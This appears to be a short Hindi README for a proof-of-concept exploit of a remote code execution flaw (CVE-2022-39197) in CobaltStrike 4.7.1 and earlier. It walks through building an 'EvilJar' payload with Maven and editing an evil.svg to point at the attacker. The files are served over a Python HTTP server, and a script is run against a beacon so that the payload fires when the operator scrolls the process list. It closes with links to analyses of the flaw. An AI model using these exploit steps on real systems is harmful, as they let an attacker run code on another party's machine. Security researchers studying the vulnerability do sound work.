
CobaltStrike <= 4.7.1 में RCE
EvilJar/src/main/java/Exploit.java में अपने पेलोड के साथ Line 19 को संपादित करेंmvn clean compile assembly:singleEvilJar-1.0-jar-with-dependencies.jar को EvilJar/target/ से serve/ फ़ोल्डर में ले जाएँserve\evil.svg को संपादित करें और [attacker] को बदलेंpython3 -m http.server 8080 का उपयोग करके सर्व करेंpython3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
जैसे ही उपयोगकर्ता प्रोसेस सूची में स्क्रॉल करता है, पेलोड ट्रिगर हो जाएगा

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — इस कमजोरी का एक शानदार गहन विश्लेषण है https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html